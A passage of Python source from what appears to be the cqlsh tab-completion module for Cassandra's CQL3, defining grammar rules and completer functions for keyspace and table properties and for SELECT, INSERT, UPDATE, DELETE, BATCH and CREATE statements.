        # (CQL3 option name, schema_columnfamilies column name (or None if same),
        # list of known map keys)
        ('compaction', 'compaction_strategy_options',
         ('class', 'max_threshold', 'tombstone_compaction_interval', 'tombstone_threshold', 'enabled', 'unchecked_tombstone_compaction')),
        ('compression', 'compression_parameters',
         ('sstable_compression', 'chunk_length_kb', 'crc_check_chance')),
    )
    # No table options are currently considered obsolete.
    obsolete_cf_options = ()
    consistency_levels = (
        'ANY',
        'ONE',
        'TWO',
        'THREE',
        'QUORUM',
        'ALL',
        'LOCAL_QUORUM',
        'EACH_QUORUM',
        'SERIAL'
    )
    @classmethod
    def escape_value(cls, value):
        """Render a Python value as a CQL literal (strings get quoted)."""
        if value is None:
            return 'NULL' # this totally won't work
        if isinstance(value, bool):
            # bool must be tested before int: True/False are int instances.
            value = str(value).lower()
        elif isinstance(value, float):
            return '%f' % value
        elif isinstance(value, int):
            return str(value)
        return "'%s'" % value.replace("'", "''")
    @staticmethod
    def escape_name(name):
        """Double-quote an identifier, doubling embedded double quotes."""
        return '"%s"' % name.replace('"', '""')
    valid_cql3_word_re = re.compile(r'^[a-z][0-9a-z_]*$')
    @classmethod
    def is_valid_cql3_name(cls, s):
        """True when ``s`` can be used as an identifier without quoting."""
        if s is None:
            return False
        if s.lower() in cls.keywords - cls.unreserved_keywords:
            return False
        return cls.valid_cql3_word_re.match(s) is not None
    @classmethod
    def maybe_escape_name(cls, name):
        """Quote ``name`` only when CQL3 requires it."""
        if cls.is_valid_cql3_name(name):
            return name
        return cls.escape_name(name)
    @staticmethod
    def dequote_name(name):
        """Strip surrounding double quotes from an identifier, undoing doubling."""
        name = name.strip()
        if name == '':
            return name
        if name[0] == '"' and name[-1] == '"':
            name = name[1:-1].replace('""', '"')
        return name
    @staticmethod
    def dequote_value(cqlword):
        """Strip surrounding single quotes from a literal, undoing doubling."""
        cqlword = cqlword.strip()
        if cqlword == '':
            return cqlword
        if cqlword[0] == "'" and cqlword[-1] == "'":
            cqlword = cqlword[1:-1].replace("''", "'")
        return cqlword
CqlRuleSet = Cql3ParsingRuleSet()
# convenience for remainder of module
# (re-export the listed CqlRuleSet methods as module-level functions)
shorthands = ('completer_for', 'explain_completion',
              'dequote_value', 'dequote_name',
              'escape_value', 'escape_name',
              'maybe_escape_name')
for shorthand in shorthands:
    globals()[shorthand] = getattr(CqlRuleSet, shorthand)
# BEGIN SYNTAX/COMPLETION RULE DEFINITIONS
syntax_rules = r'''
<Start> ::= <CQL_Statement>*
;
<CQL_Statement> ::= [statements]=<statementBody> ";"
;
# the order of these terminal productions is significant:
<endline> ::= /\n/ ;
JUNK ::= /([ \t\r\f\v]+|(--|[/][/])[^\n\r]*([\n\r]|$)|[/][*].*?[*][/])/ ;
<stringLiteral> ::= /'([^']|'')*'/ ;
<quotedName> ::= /"([^"]|"")*"/ ;
<float> ::= /-?[0-9]+\.[0-9]+/ ;
<uuid> ::= /[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/ ;
<blobLiteral> ::= /0x[0-9a-f]+/ ;
<wholenumber> ::= /[0-9]+/ ;
<identifier> ::= /[a-z][a-z0-9_]*/ ;
<colon> ::= ":" ;
<star> ::= "*" ;
<endtoken> ::= ";" ;
<op> ::= /[-+=,().]/ ;
<cmp> ::= /[<>]=?/ ;
<brackets> ::= /[][{}]/ ;
<integer> ::= "-"? <wholenumber> ;
<boolean> ::= "true"
| "false"
;
<unclosedString> ::= /'([^']|'')*/ ;
<unclosedName> ::= /"([^"]|"")*/ ;
<unclosedComment> ::= /[/][*].*$/ ;
<term> ::= <stringLiteral>
| <integer>
| <float>
| <uuid>
| <boolean>
| <blobLiteral>
| <functionName> <functionArguments>
;
<functionArguments> ::= "(" ( <term> ( "," <term> )* )? ")"
;
<tokenDefinition> ::= token="TOKEN" "(" <term> ( "," <term> )* ")"
| <term>
;
<value> ::= <term>
| <collectionLiteral>
;
<cident> ::= <quotedName>
| <identifier>
| <unreservedKeyword>
;
<colname> ::= <cident> ; # just an alias
<collectionLiteral> ::= <listLiteral>
| <setLiteral>
| <mapLiteral>
;
<listLiteral> ::= "[" ( <term> ( "," <term> )* )? "]"
;
<setLiteral> ::= "{" ( <term> ( "," <term> )* )? "}"
;
<mapLiteral> ::= "{" <term> ":" <term> ( "," <term> ":" <term> )* "}"
;
<functionName> ::= <identifier>
;
<statementBody> ::= <useStatement>
| <selectStatement>
| <dataChangeStatement>
| <schemaChangeStatement>
| <authenticationStatement>
| <authorizationStatement>
;
<dataChangeStatement> ::= <insertStatement>
| <updateStatement>
| <deleteStatement>
| <truncateStatement>
| <batchStatement>
;
<schemaChangeStatement> ::= <createKeyspaceStatement>
| <createColumnFamilyStatement>
| <createIndexStatement>
| <dropKeyspaceStatement>
| <dropColumnFamilyStatement>
| <dropIndexStatement>
| <alterTableStatement>
| <alterKeyspaceStatement>
;
<authenticationStatement> ::= <createUserStatement>
| <alterUserStatement>
| <dropUserStatement>
| <listUsersStatement>
;
<authorizationStatement> ::= <grantStatement>
| <revokeStatement>
| <listPermissionsStatement>
;
# timestamp is included here, since it's also a keyword
<simpleStorageType> ::= typename=( <identifier> | <stringLiteral> | <K_TIMESTAMP> ) ;
<storageType> ::= <simpleStorageType> | <collectionType> ;
<collectionType> ::= "map" "<" <simpleStorageType> "," <simpleStorageType> ">"
| "list" "<" <simpleStorageType> ">"
| "set" "<" <simpleStorageType> ">"
;
<columnFamilyName> ::= ( ksname=<cfOrKsName> dot="." )? cfname=<cfOrKsName> ;
<keyspaceName> ::= ksname=<cfOrKsName> ;
<nonSystemKeyspaceName> ::= ksname=<cfOrKsName> ;
<alterableKeyspaceName> ::= ksname=<cfOrKsName> ;
<cfOrKsName> ::= <identifier>
| <quotedName>
| <unreservedKeyword>;
<unreservedKeyword> ::= nocomplete=
( <K_KEY>
| <K_CLUSTERING>
# | <K_COUNT> -- to get count(*) completion, treat count as reserved
| <K_TTL>
| <K_COMPACT>
| <K_STORAGE>
| <K_TYPE>
| <K_VALUES> )
;
<property> ::= [propname]=<cident> propeq="=" [propval]=<propertyValue>
;
<propertyValue> ::= propsimpleval=( <stringLiteral>
| <identifier>
| <integer>
| <float>
| <unreservedKeyword> )
# we don't use <mapLiteral> here so we can get more targeted
# completions:
| propsimpleval="{" [propmapkey]=<term> ":" [propmapval]=<term>
( ender="," [propmapkey]=<term> ":" [propmapval]=<term> )*
ender="}"
;
'''
def prop_equals_completer(ctxt, cass):
    """Complete the '=' between a property name and its value."""
    if not working_on_keyspace(ctxt):
        # we know if the thing in the property name position is "compact" or
        # "clustering" that there won't actually be an equals sign, because
        # there are no properties by those names. there are, on the other hand,
        # table properties that start with those keywords which don't have
        # equals signs at all.
        curprop = ctxt.get_binding('propname')[-1].upper()
        if curprop in ('COMPACT', 'CLUSTERING'):
            return ()
    return ['=']
completer_for('property', 'propeq')(prop_equals_completer)
@completer_for('property', 'propname')
def prop_name_completer(ctxt, cass):
    """Dispatch property-name completion to keyspace or table handler."""
    if working_on_keyspace(ctxt):
        return ks_prop_name_completer(ctxt, cass)
    else:
        return cf_prop_name_completer(ctxt, cass)
@completer_for('propertyValue', 'propsimpleval')
def prop_val_completer(ctxt, cass):
    """Dispatch property-value completion to keyspace or table handler."""
    if working_on_keyspace(ctxt):
        return ks_prop_val_completer(ctxt, cass)
    else:
        return cf_prop_val_completer(ctxt, cass)
@completer_for('propertyValue', 'propmapkey')
def prop_val_mapkey_completer(ctxt, cass):
    """Dispatch map-key completion to keyspace or table handler."""
    if working_on_keyspace(ctxt):
        return ks_prop_val_mapkey_completer(ctxt, cass)
    else:
        return cf_prop_val_mapkey_completer(ctxt, cass)
@completer_for('propertyValue', 'propmapval')
def prop_val_mapval_completer(ctxt, cass):
    """Dispatch map-value completion to keyspace or table handler."""
    if working_on_keyspace(ctxt):
        return ks_prop_val_mapval_completer(ctxt, cass)
    else:
        return cf_prop_val_mapval_completer(ctxt, cass)
@completer_for('propertyValue', 'ender')
def prop_val_mapender_completer(ctxt, cass):
    """Dispatch map-terminator completion to keyspace or table handler."""
    if working_on_keyspace(ctxt):
        return ks_prop_val_mapender_completer(ctxt, cass)
    else:
        return cf_prop_val_mapender_completer(ctxt, cass)
def ks_prop_name_completer(ctxt, cass):
    """Suggest keyspace property names; 'replication' is offered first."""
    props_seen = ctxt.get_binding('propname', ())
    if 'replication' in props_seen:
        return ["durable_writes"]
    return ['replication']
def ks_prop_val_completer(ctxt, cass):
    """Suggest values for keyspace-level properties."""
    current_prop = ctxt.get_binding('propname')[-1]
    if current_prop == 'replication':
        return ["{'class': '"]
    if current_prop == 'durable_writes':
        return ["'true'", "'false'"]
    return ()
def ks_prop_val_mapkey_completer(ctxt, cass):
    """Suggest map keys inside a keyspace 'replication' option value."""
    optname = ctxt.get_binding('propname')[-1]
    if optname != 'replication':
        return ()
    keysseen = map(dequote_value, ctxt.get_binding('propmapkey', ()))
    valsseen = map(dequote_value, ctxt.get_binding('propmapval', ()))
    for k, v in zip(keysseen, valsseen):
        if k == 'class':
            repclass = v
            break
    else:
        # No strategy class entered yet; it must come first.
        return ["'class'"]
    # Bug fix: initialize opts so an unrecognized strategy class no longer
    # raises UnboundLocalError at the final return.
    opts = set()
    if repclass in CqlRuleSet.replication_factor_strategies:
        opts.add('replication_factor')
    elif repclass == 'NetworkTopologyStrategy':
        return [Hint('<dc_name>')]
    return map(escape_value, opts.difference(keysseen))
def ks_prop_val_mapval_completer(ctxt, cass):
    """Suggest map values inside a keyspace 'replication' option value."""
    optname = ctxt.get_binding('propname')[-1]
    if optname != 'replication':
        return ()
    currentkey = dequote_value(ctxt.get_binding('propmapkey')[-1])
    if currentkey == 'class':
        return map(escape_value, CqlRuleSet.replication_strategies)
    return [Hint('<value>')]
def ks_prop_val_mapender_completer(ctxt, cass):
    """Choose between ',' and '}' while completing a replication map."""
    optname = ctxt.get_binding('propname')[-1]
    if optname != 'replication':
        return [',']
    keysseen = map(dequote_value, ctxt.get_binding('propmapkey', ()))
    valsseen = map(dequote_value, ctxt.get_binding('propmapval', ()))
    for k, v in zip(keysseen, valsseen):
        if k == 'class':
            repclass = v
            break
    else:
        # No strategy class typed yet, so more pairs must follow.
        return [',']
    if repclass in CqlRuleSet.replication_factor_strategies:
        if 'replication_factor' not in keysseen:
            return [',']
    if repclass == 'NetworkTopologyStrategy' and len(keysseen) == 1:
        return [',']
    return ['}']
def cf_prop_name_completer(ctxt, cass):
    """Suggest table property names (scalar and map-valued options)."""
    return [c[0] for c in (CqlRuleSet.columnfamily_layout_options +
                           CqlRuleSet.columnfamily_layout_map_options)]
def cf_prop_val_completer(ctxt, cass):
    """Suggest a value (or a value hint) for the table property being set."""
    propname = ctxt.get_binding('propname')[-1]
    if propname == 'compression':
        return ["{'sstable_compression': '"]
    if propname == 'compaction':
        return ["{'class': '"]
    if any(propname == opt[0] for opt in CqlRuleSet.obsolete_cf_options):
        return ["'<obsolete_option>'"]
    chance_options = ('read_repair_chance', 'bloom_filter_fp_chance',
                      'dclocal_read_repair_chance')
    if propname in chance_options:
        return [Hint('<float_between_0_and_1>')]
    if propname in ('replicate_on_write', 'populate_io_cache_on_flush'):
        return ["'yes'", "'no'"]
    integer_options = ('min_compaction_threshold', 'max_compaction_threshold',
                       'gc_grace_seconds', 'index_interval')
    if propname in integer_options:
        return [Hint('<integer>')]
    return [Hint('<option_value>')]
def cf_prop_val_mapkey_completer(ctxt, cass):
    """Suggest sub-option keys for map-valued table properties
    (compression/compaction); for compaction, the set of valid keys
    depends on the already-chosen compaction class."""
    optname = ctxt.get_binding('propname')[-1]
    # only the map-valued properties are handled here
    for cql3option, _, subopts in CqlRuleSet.columnfamily_layout_map_options:
        if optname == cql3option:
            break
    else:
        return ()
    keysseen = map(dequote_value, ctxt.get_binding('propmapkey', ()))
    valsseen = map(dequote_value, ctxt.get_binding('propmapval', ()))
    pairsseen = dict(zip(keysseen, valsseen))
    if optname == 'compression':
        return map(escape_value, set(subopts).difference(keysseen))
    if optname == 'compaction':
        opts = set(subopts)
        try:
            csc = pairsseen['class']
        except KeyError:
            # 'class' is mandatory and determines the other valid keys
            return ["'class'"]
        csc = csc.split('.')[-1]
        if csc == 'SizeTieredCompactionStrategy':
            opts.add('min_sstable_size')
            opts.add('min_threshold')
            opts.add('bucket_high')
            opts.add('bucket_low')
            opts.add('cold_reads_to_omit')
        elif csc == 'LeveledCompactionStrategy':
            opts.add('sstable_size_in_mb')
        return map(escape_value, opts)
    return ()
def cf_prop_val_mapval_completer(ctxt, cass):
    """Suggest a value for the current compaction/compression sub-option."""
    propname = ctxt.get_binding('propname')[-1]
    subkey = dequote_value(ctxt.get_binding('propmapkey')[-1])
    if propname == 'compaction':
        if subkey == 'class':
            return map(escape_value, CqlRuleSet.available_compaction_classes)
        return [Hint('<option_value>')]
    if propname == 'compression':
        if subkey == 'sstable_compression':
            return map(escape_value, CqlRuleSet.available_compression_classes)
        return [Hint('<option_value>')]
    return ()
def cf_prop_val_mapender_completer(ctxt, cass):
    """After a sub-option entry, either continue the map (',') or close it ('}')."""
    return [',', '}']
@completer_for('tokenDefinition', 'token')
def token_word_completer(ctxt, cass):
    """Complete the literal 'token(' opener of a token expression."""
    return ['token(']
@completer_for('simpleStorageType', 'typename')
def storagetype_completer(ctxt, cass):
    """Complete a column type with the simple (non-collection) CQL types."""
    return simple_cql_types
@completer_for('keyspaceName', 'ksname')
def ks_name_completer(ctxt, cass):
    """Complete with every keyspace name known to the connection."""
    return map(maybe_escape_name, cass.get_keyspace_names())
@completer_for('nonSystemKeyspaceName', 'ksname')
def ks_name_completer(ctxt, cass):
    """Complete with user keyspaces only (system keyspaces excluded)."""
    ksnames = [n for n in cass.get_keyspace_names() if n not in SYSTEM_KEYSPACES]
    return map(maybe_escape_name, ksnames)
@completer_for('alterableKeyspaceName', 'ksname')
def ks_name_completer(ctxt, cass):
    """Complete with keyspaces that may be ALTERed."""
    # NONALTERBALE_KEYSPACES matches the constant's (misspelled) name elsewhere
    ksnames = [n for n in cass.get_keyspace_names() if n not in NONALTERBALE_KEYSPACES]
    return map(maybe_escape_name, ksnames)
@completer_for('columnFamilyName', 'ksname')
def cf_ks_name_completer(ctxt, cass):
    """For a qualified table name, offer every keyspace with a trailing dot."""
    return [maybe_escape_name(ks) + '.' for ks in cass.get_keyspace_names()]
@completer_for('columnFamilyName', 'dot')
def cf_ks_dot_completer(ctxt, cass):
    """Offer '.' only after a keyspace name that actually exists."""
    ksname = dequote_name(ctxt.get_binding('ksname'))
    return ['.'] if ksname in cass.get_keyspace_names() else []
@completer_for('columnFamilyName', 'cfname')
def cf_name_completer(ctxt, cass):
    """Complete table names, scoped to the bound keyspace when one was typed."""
    ks = ctxt.get_binding('ksname', None)
    if ks is not None:
        ks = dequote_name(ks)
    try:
        cfnames = cass.get_columnfamily_names(ks)
    except Exception:
        # with no explicit keyspace there may be no current keyspace either;
        # in that case offer nothing rather than propagate the error
        if ks is None:
            return ()
        raise
    return map(maybe_escape_name, cfnames)
@completer_for('unreservedKeyword', 'nocomplete')
def unreserved_keyword_completer(ctxt, cass):
    """Deliberately complete nothing for unreserved keywords."""
    # we never want to provide completions through this production;
    # this is always just to allow use of some keywords as column
    # names, CF names, property values, etc.
    return ()
def get_cf_layout(ctxt, cass):
    """Fetch the table layout for the table bound in the current context."""
    ksname = ctxt.get_binding('ksname', None)
    if ksname is not None:
        ksname = dequote_name(ksname)
    cfname = dequote_name(ctxt.get_binding('cfname'))
    return cass.get_columnfamily_layout(ksname, cfname)
def working_on_keyspace(ctxt):
    """Return True when the statement target is a keyspace (or SCHEMA alias)."""
    target = ctxt.get_binding('wat').upper()
    return target in ('KEYSPACE', 'SCHEMA')
syntax_rules += r'''
<useStatement> ::= "USE" <keyspaceName>
;
<selectStatement> ::= "SELECT" <selectClause>
"FROM" cf=<columnFamilyName>
( "WHERE" <whereClause> )?
( "ORDER" "BY" <orderByClause> ( "," <orderByClause> )* )?
( "LIMIT" limit=<wholenumber> )?
;
<whereClause> ::= <relation> ( "AND" <relation> )*
;
<relation> ::= [rel_lhs]=<cident> ( "=" | "<" | ">" | "<=" | ">=" ) <term>
| token="TOKEN" "(" [rel_tokname]=<cident>
( "," [rel_tokname]=<cident> )*
")" ("=" | "<" | ">" | "<=" | ">=") <tokenDefinition>
| [rel_lhs]=<cident> "IN" "(" <term> ( "," <term> )* ")"
;
<selectClause> ::= "DISTINCT"? <selector> ("AS" <cident>)? ("," <selector> ("AS" <cident>)?)*
| "*"
| "COUNT" "(" star=( "*" | "1" ) ")" ("AS" <cident>)?
;
<selector> ::= [colname]=<cident>
| "WRITETIME" "(" [colname]=<cident> ")"
| "TTL" "(" [colname]=<cident> ")"
| <functionName> <selectionFunctionArguments>
;
<selectionFunctionArguments> ::= "(" ( <selector> ( "," <selector> )* )? ")"
;
<orderByClause> ::= [ordercol]=<cident> ( "ASC" | "DESC" )?
;
'''
@completer_for('orderByClause', 'ordercol')
def select_order_column_completer(ctxt, cass):
    """Suggest the next clustering column usable in ORDER BY.

    ORDER BY is only legal once the partition key is restricted in the
    WHERE clause, and columns must be supplied in clustering order.
    """
    prev_order_cols = ctxt.get_binding('ordercol', ())
    keyname = ctxt.get_binding('keyname')
    if keyname is None:
        keyname = ctxt.get_binding('rel_lhs', ())
        if not keyname:
            return [Hint("Can't ORDER BY here: need to specify partition key in WHERE clause")]
    layout = get_cf_layout(ctxt, cass)
    order_by_candidates = layout.clustering_key_columns[:]
    if len(order_by_candidates) > len(prev_order_cols):
        # offer exactly the next clustering column in declaration order
        return [maybe_escape_name(order_by_candidates[len(prev_order_cols)])]
    return [Hint('No more orderable columns here.')]
@completer_for('relation', 'token')
def relation_token_word_completer(ctxt, cass):
    """Complete the TOKEN( opener of a token relation."""
    return ['TOKEN(']
@completer_for('relation', 'rel_tokname')
def relation_token_subject_completer(ctxt, cass):
    """Inside TOKEN(...), suggest the first partition-key column."""
    layout = get_cf_layout(ctxt, cass)
    return [layout.partition_key_columns[0]]
@completer_for('relation', 'rel_lhs')
def select_relation_lhs_completer(ctxt, cass):
    """Suggest columns that can legally appear on the LHS of a WHERE relation.

    Allowed: the first partition-key and first clustering column, any key
    component whose predecessor is already filtered on, and indexed columns.
    """
    layout = get_cf_layout(ctxt, cass)
    filterable = set((layout.partition_key_columns[0], layout.clustering_key_columns[0]))
    already_filtered_on = map(dequote_name, ctxt.get_binding('rel_lhs'))
    # key components must be restricted left-to-right without gaps
    for num in range(1, len(layout.partition_key_columns)):
        if layout.partition_key_columns[num - 1] in already_filtered_on:
            filterable.add(layout.partition_key_columns[num])
        else:
            break
    for num in range(1, len(layout.clustering_key_columns)):
        if layout.clustering_key_columns[num - 1] in already_filtered_on:
            filterable.add(layout.clustering_key_columns[num])
        else:
            break
    # secondary-indexed columns are always filterable
    for cd in layout.columns:
        if cd.index_name is not None:
            filterable.add(cd.name)
    return map(maybe_escape_name, filterable)
@completer_for('selectClause', 'star')
def select_count_star_completer(ctxt, cass):
    """Inside COUNT(...), prefer '*' over the equivalent '1'."""
    return ['*']
explain_completion('selector', 'colname')
syntax_rules += r'''
<insertStatement> ::= "INSERT" "INTO" cf=<columnFamilyName>
"(" [colname]=<cident> "," [colname]=<cident>
( "," [colname]=<cident> )* ")"
"VALUES" "(" [newval]=<value> valcomma="," [newval]=<value>
( valcomma="," [newval]=<value> )* valcomma=")"
( "USING" [insertopt]=<usingOption>
( "AND" [insertopt]=<usingOption> )* )?
;
<usingOption> ::= "TIMESTAMP" <wholenumber>
| "TTL" <wholenumber>
;
'''
@completer_for('insertStatement', 'colname')
def insert_colname_completer(ctxt, cass):
    """Suggest the next column for an INSERT column list.

    Primary-key columns are offered one at a time, in order; once they are
    all present, any not-yet-used regular column is offered.
    """
    layout = get_cf_layout(ctxt, cass)
    seen = set(map(dequote_name, ctxt.get_binding('colname', ())))
    for keycol in layout.primary_key_columns:
        if keycol not in seen:
            return [maybe_escape_name(keycol)]
    remaining = set(layout.regular_columns) - seen
    return map(maybe_escape_name, remaining)
@completer_for('insertStatement', 'newval')
def insert_newval_completer(ctxt, cass):
    """Suggest an opener or hint for the next VALUES entry, based on the
    CQL type of the column it corresponds to positionally."""
    layout = get_cf_layout(ctxt, cass)
    insertcols = map(dequote_name, ctxt.get_binding('colname'))
    valuesdone = ctxt.get_binding('newval', ())
    if len(valuesdone) >= len(insertcols):
        # more values than columns: nothing sensible to offer
        return []
    curcol = insertcols[len(valuesdone)]
    cqltype = layout.get_column(curcol).cqltype
    coltype = cqltype.typename
    if coltype in ('map', 'set'):
        return ['{']
    if coltype == 'list':
        return ['[']
    if coltype == 'boolean':
        return ['true', 'false']
    return [Hint('<value for %s (%s)>' % (maybe_escape_name(curcol),
                                          cqltype.cql_parameterized_type()))]
@completer_for('insertStatement', 'valcomma')
def insert_valcomma_completer(ctxt, cass):
    """Emit ',' while more VALUES are expected, ')' once the list is full."""
    # layout fetched as in the original (may raise for an unknown table)
    layout = get_cf_layout(ctxt, cass)
    expected = len(ctxt.get_binding('colname', ()))
    supplied = len(ctxt.get_binding('newval', ()))
    return [','] if expected > supplied else [')']
@completer_for('insertStatement', 'insertopt')
def insert_option_completer(ctxt, cass):
    """Offer the USING options (TIMESTAMP/TTL) not already specified."""
    remaining = set(('TIMESTAMP', 'TTL'))
    for used in ctxt.get_binding('insertopt', ()):
        remaining.discard(used.split()[0])
    return remaining
syntax_rules += r'''
<updateStatement> ::= "UPDATE" cf=<columnFamilyName>
( "USING" [updateopt]=<usingOption>
( "AND" [updateopt]=<usingOption> )* )?
"SET" <assignment> ( "," <assignment> )*
"WHERE" <whereClause>
;
<assignment> ::= updatecol=<cident>
( "=" update_rhs=( <value> | <cident> )
( counterop=( "+" | "-" ) inc=<wholenumber>
| listadder="+" listcol=<cident> )
| indexbracket="[" <term> "]" "=" <term> )
;
'''
@completer_for('updateStatement', 'updateopt')
def insert_option_completer(ctxt, cass):
    """Offer the USING options (TIMESTAMP/TTL) not already specified."""
    remaining = set(('TIMESTAMP', 'TTL'))
    for used in ctxt.get_binding('updateopt', ()):
        remaining.discard(used.split()[0])
    return remaining
@completer_for('assignment', 'updatecol')
def update_col_completer(ctxt, cass):
    """Suggest non-key columns as SET targets (keys cannot be updated)."""
    layout = get_cf_layout(ctxt, cass)
    return map(maybe_escape_name, layout.regular_columns)
@completer_for('assignment', 'update_rhs')
def update_countername_completer(ctxt, cass):
    """Suggest the RHS opener for a SET assignment, by column type:
    the column itself for counters (c = c + 1), an opening bracket for
    collections, or a typed hint otherwise."""
    layout = get_cf_layout(ctxt, cass)
    curcol = dequote_name(ctxt.get_binding('updatecol', ''))
    cqltype = layout.get_column(curcol).cqltype
    coltype = cqltype.typename
    if coltype == 'counter':
        return [maybe_escape_name(curcol)]
    if coltype in ('map', 'set'):
        return ["{"]
    if coltype == 'list':
        return ["["]
    return [Hint('<term (%s)>' % cqltype.cql_parameterized_type())]
@completer_for('assignment', 'counterop')
def update_counterop_completer(ctxt, cass):
    """Offer '+'/'-' only when the column being SET is a counter."""
    layout = get_cf_layout(ctxt, cass)
    colname = dequote_name(ctxt.get_binding('updatecol', ''))
    if layout.is_counter_col(colname):
        return ['+', '-']
    return []
@completer_for('assignment', 'inc')
def update_counter_inc_completer(ctxt, cass):
    """Hint a whole-number increment, for counter columns only."""
    layout = get_cf_layout(ctxt, cass)
    colname = dequote_name(ctxt.get_binding('updatecol', ''))
    return [Hint('<wholenumber>')] if layout.is_counter_col(colname) else []
@completer_for('assignment', 'listadder')
def update_listadder_completer(ctxt, cass):
    """Offer '+' only when the RHS literal opened a list ('[')."""
    if ctxt.get_binding('update_rhs').startswith('['):
        return ['+']
    return []
@completer_for('assignment', 'listcol')
def update_listcol_completer(ctxt, cass):
    """For 'col = [..] + x', suggest the assigned column itself as x."""
    if not ctxt.get_binding('update_rhs').startswith('['):
        return []
    colname = dequote_name(ctxt.get_binding('updatecol'))
    return [maybe_escape_name(colname)]
@completer_for('assignment', 'indexbracket')
def update_indexbracket_completer(ctxt, cass):
    """Offer '[' for subscript assignment on map/list columns only."""
    layout = get_cf_layout(ctxt, cass)
    colname = dequote_name(ctxt.get_binding('updatecol', ''))
    typename = layout.get_column(colname).cqltype.typename
    return ['['] if typename in ('map', 'list') else []
syntax_rules += r'''
<deleteStatement> ::= "DELETE" ( <deleteSelector> ( "," <deleteSelector> )* )?
"FROM" cf=<columnFamilyName>
( "USING" [delopt]=<deleteOption> )?
"WHERE" <whereClause>
;
<deleteSelector> ::= delcol=<cident> ( memberbracket="[" memberselector=<term> "]" )?
;
<deleteOption> ::= "TIMESTAMP" <wholenumber>
;
'''
@completer_for('deleteStatement', 'delopt')
def delete_opt_completer(ctxt, cass):
    """Offer DELETE USING options not already given (only TIMESTAMP exists)."""
    remaining = set(('TIMESTAMP',))
    for used in ctxt.get_binding('delopt', ()):
        remaining.discard(used.split()[0])
    return remaining
@completer_for('deleteSelector', 'delcol')
def delete_delcol_completer(ctxt, cass):
    """Suggest non-key columns as DELETE targets."""
    layout = get_cf_layout(ctxt, cass)
    return map(maybe_escape_name, layout.regular_columns)
syntax_rules += r'''
<batchStatement> ::= "BEGIN" ( "UNLOGGED" | "COUNTER" )? "BATCH"
( "USING" [batchopt]=<usingOption>
( "AND" [batchopt]=<usingOption> )* )?
[batchstmt]=<batchStatementMember> ";"?
( [batchstmt]=<batchStatementMember> ";"? )*
"APPLY" "BATCH"
;
<batchStatementMember> ::= <insertStatement>
| <updateStatement>
| <deleteStatement>
;
'''
@completer_for('batchStatement', 'batchopt')
def batch_opt_completer(ctxt, cass):
    """Offer BATCH USING options not already given (only TIMESTAMP here)."""
    remaining = set(('TIMESTAMP',))
    for used in ctxt.get_binding('batchopt', ()):
        remaining.discard(used.split()[0])
    return remaining
syntax_rules += r'''
<truncateStatement> ::= "TRUNCATE" cf=<columnFamilyName>
;
'''
syntax_rules += r'''
<createKeyspaceStatement> ::= "CREATE" wat=( "KEYSPACE" | "SCHEMA" ) ("IF" "NOT" "EXISTS")? ksname=<cfOrKsName>
"WITH" <property> ( "AND" <property> )*
;
'''
@completer_for('createKeyspaceStatement', 'wat')
def create_ks_wat_completer(ctxt, cass):
    """Prefer KEYSPACE; only offer SCHEMA once the user has started typing."""
    # would prefer to get rid of the "schema" nomenclature in cql3
    if ctxt.get_binding('partial', '') != '':
        return ['KEYSPACE', 'SCHEMA']
    return ['KEYSPACE']
syntax_rules += r'''
<createColumnFamilyStatement> ::= "CREATE" wat=( "COLUMNFAMILY" | "TABLE" ) ("IF" "NOT" "EXISTS")?
( ks=<nonSystemKeyspaceName> dot="." )? cf=<cfOrKsName>
"(" ( <singleKeyCfSpec> | <compositeKeyCfSpec> ) ")"
( "WITH" <cfamProperty> ( "AND" <cfamProperty> )* )?
;
<cfamProperty> ::= <property>
| "COMPACT" "STORAGE"
| "CLUSTERING" "ORDER" "BY" "(" <cfamOrdering>
( "," <cfamOrdering> )* ")"
;
<cfamOrdering> ::= [ordercol]=<cident> ( "ASC" | "DESC" )
;
<singleKeyCfSpec> ::= [newcolname]=<cident> <simpleStorageType> "PRIMARY" "KEY"
( "," [newcolname]=<cident> <storageType> )*
;
<compositeKeyCfSpec> ::= [newcolname]=<cident> <simpleStorageType>
"," [newcolname]=<cident> <storageType> ( "static" )?
( "," [newcolname]=<cident> <storageType> ( "static" )? )*
"," "PRIMARY" k="KEY" p="(" ( partkey=<pkDef> | [pkey]=<cident> )
( c="," [pkey]=<cident> )* ")"
;
<pkDef> ::= "(" [ptkey]=<cident> "," [ptkey]=<cident>
( "," [ptkey]=<cident> )* ")"
;
'''
@completer_for('cfamOrdering', 'ordercol')
def create_cf_clustering_order_colname_completer(ctxt, cass):
    """Suggest declared column names for CLUSTERING ORDER BY."""
    # Definitely some of these aren't valid for ordering, but I'm not sure
    # precisely which are. This is good enough for now
    return map(dequote_name, ctxt.get_binding('newcolname', ()))
@completer_for('createColumnFamilyStatement', 'wat')
def create_cf_wat_completer(ctxt, cass):
    """Prefer TABLE; only offer COLUMNFAMILY once the user has started typing."""
    # would prefer to get rid of the "columnfamily" nomenclature in cql3
    if ctxt.get_binding('partial', '') != '':
        return ['TABLE', 'COLUMNFAMILY']
    return ['TABLE']
# Placeholder completions for brand-new table and column names.
explain_completion('createColumnFamilyStatement', 'cf', '<new_table_name>')
explain_completion('compositeKeyCfSpec', 'newcolname', '<new_column_name>')
@completer_for('createColumnFamilyStatement', 'dot')
def create_cf_ks_dot_completer(ctxt, cass):
    """Offer '.' only after a keyspace name that actually exists."""
    ksname = dequote_name(ctxt.get_binding('ks'))
    return ['.'] if ksname in cass.get_keyspace_names() else []
@completer_for('pkDef', 'ptkey')
def create_cf_pkdef_declaration_completer(ctxt, cass):
    """Suggest the next declared column for a composite partition key,
    keeping at least one column available for clustering."""
    declared = ctxt.get_binding('newcolname')
    used = map(dequote_name, ctxt.get_binding('ptkey', ()))
    while declared[0] in used:
        declared = declared[1:]
    if len(declared) < 2:
        return ()
    return [maybe_escape_name(declared[0])]
@completer_for('compositeKeyCfSpec', 'pkey')
def create_cf_composite_key_declaration_completer(ctxt, cass):
    """Suggest the next declared column for the PRIMARY KEY clause,
    skipping those already used in the partition key or key list."""
    declared = ctxt.get_binding('newcolname')
    used = ctxt.get_binding('ptkey', ()) + ctxt.get_binding('pkey', ())
    used = map(dequote_name, used)
    while declared[0] in used:
        declared = declared[1:]
    if len(declared) < 2:
        return ()
    return [maybe_escape_name(declared[0])]
@completer_for('compositeKeyCfSpec', 'k')
def create_cf_composite_primary_key_keyword_completer(ctxt, cass):
    """Complete 'KEY (' after PRIMARY in a composite key spec."""
    return ['KEY (']
@completer_for('compositeKeyCfSpec', 'p')
